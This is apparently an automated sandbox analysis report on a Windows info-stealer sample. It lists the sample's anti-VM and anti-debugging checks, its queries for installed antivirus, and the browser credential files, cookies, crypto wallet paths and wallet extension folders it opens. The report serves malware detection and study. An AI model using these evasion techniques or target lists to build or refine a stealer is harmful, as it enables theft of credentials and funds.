              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68D61E second address: 68D628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop esi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68DA70 second address: 68DA74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68DA74 second address: 68DA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90A04 second address: 4B90A49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FEC4A6534F0h 0x0000000f jmp 00007FEBD887DA7Eh 0x00000014 xchg eax, esi 0x00000015 jmp 00007FEBD887DA80h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90A49 second address: 4B90A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90A4D second address: 4B90A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90A51 second address: 4B90A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90A57 second address: 4B90A7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEBD887DA80h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90A7F second address: 4B90A85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90A9B second address: 4B90AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90AA2 second address: 4B90AC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 76E7A87Bh 0x00000008 jmp 00007FEBD8FBE240h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90AC4 second address: 4B90AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90AC8 second address: 4B90ACE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90ACE second address: 4B90AFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f mov edi, 358524BEh 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push ecx 0x0000001a pop edx 0x0000001b mov dx, cx 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90B27 second address: 4B90B5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 mov al, DAh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FEBD8FBE242h 0x00000015 adc si, CF48h 0x0000001a jmp 00007FEBD8FBE23Bh 0x0000001f popfd 0x00000020 push ecx 0x00000021 pop edi 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90B5D second address: 4B90B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEBD887DA80h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90B71 second address: 4B90B97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE23Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEBD8FBE240h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90B97 second address: 4B90BA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Special instruction interceptor: First address: 43781D instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Special instruction interceptor: First address: 66451F instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe TID: 5808 | Thread sleep time: -240000s >= -30000s
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe TID: 5844 | Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: NAliwxUTJ4.exe, 00000001.00000002.2730093310.00000000005BF000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: NAliwxUTJ4.exe, NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2647921088.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2674035293.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2670051008.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2726917999.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E27000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.0000000005501000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696487552p
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
              Source: NAliwxUTJ4.exe | Binary or memory string: vMcIJ
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696487552s
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2647921088.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2674035293.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2670051008.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2726917999.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E75000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWC`e
              Source: NAliwxUTJ4.exe, 00000001.00000002.2730093310.00000000005BF000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | System information queried: ModuleInformation
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Thread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Open window title or class name: regmonclass
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Open window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Open window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Open window title or class name: ollydbg
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Open window title or class name: filemonclass
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: NTICE
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: SICE
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: SIWVID
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Process queried: DebugPort

              HIPS / PFW / Operating System Protection Evasion

              Source: NAliwxUTJ4.exe, 00000001.00000002.2730093310.00000000005BF000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: 2Program Manager
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: NAliwxUTJ4.exe, 00000001.00000003.2674035293.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2673918520.00000000054C3000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2674035293.0000000000E65000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: Process Memory Space: NAliwxUTJ4.exe PID: 828, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              Source: NAliwxUTJ4.exe | String found in binary or memory: %appdata%\Electrum\wallets
              Source: NAliwxUTJ4.exe | String found in binary or memory: Wallets/ElectronCash
              Source: NAliwxUTJ4.exe | String found in binary or memory: Jaxx Liberty
              Source: NAliwxUTJ4.exe | String found in binary or memory: window-state.json
              Source: NAliwxUTJ4.exe | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: NAliwxUTJ4.exe | String found in binary or memory: Wallets/Exodus
              Source: NAliwxUTJ4.exe | String found in binary or memory: Wallets/Ethereum
              Source: NAliwxUTJ4.exe | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: NAliwxUTJ4.exe | String found in binary or memory: keystore
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
